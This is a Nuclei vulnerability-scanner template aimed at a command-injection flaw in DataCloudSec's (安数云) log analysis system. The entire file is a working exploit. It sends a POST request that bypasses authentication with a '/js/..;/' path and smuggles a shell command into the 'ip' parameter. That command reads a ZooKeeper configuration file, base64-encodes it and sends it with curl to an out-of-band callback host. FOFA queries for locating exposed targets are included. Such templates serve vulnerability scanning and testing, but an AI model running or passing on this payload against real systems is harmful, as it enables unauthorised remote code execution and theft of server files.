id: datacloudsec-assetScanns-rce
info:
  name: 安数云综合日志分析系统 assetScanns 命令执行漏洞
  author: leadlife
  severity: critical
  description: 
  reference: 
    - demo
  classification:
    cve-id: 
  metadata:
    verified: true/false
    fofa-query: icon_hash="829311222" || icon_hash="-2008445303"
    hunter-query: demo
    tips:
    repair:
    version:
  tags: oob,datacloudsec,rce

http:
  - raw:
      - |
        POST /js/..;/assetTopo/assetScanns HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        ip=127.0.0.1;curl http://{{interactsh-url}} -d `cat /opt/software/zookeeper/conf/zoo.cfg |base64 -w 0`;&port=80
      
        
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "dns"
          - "http"
        condition: or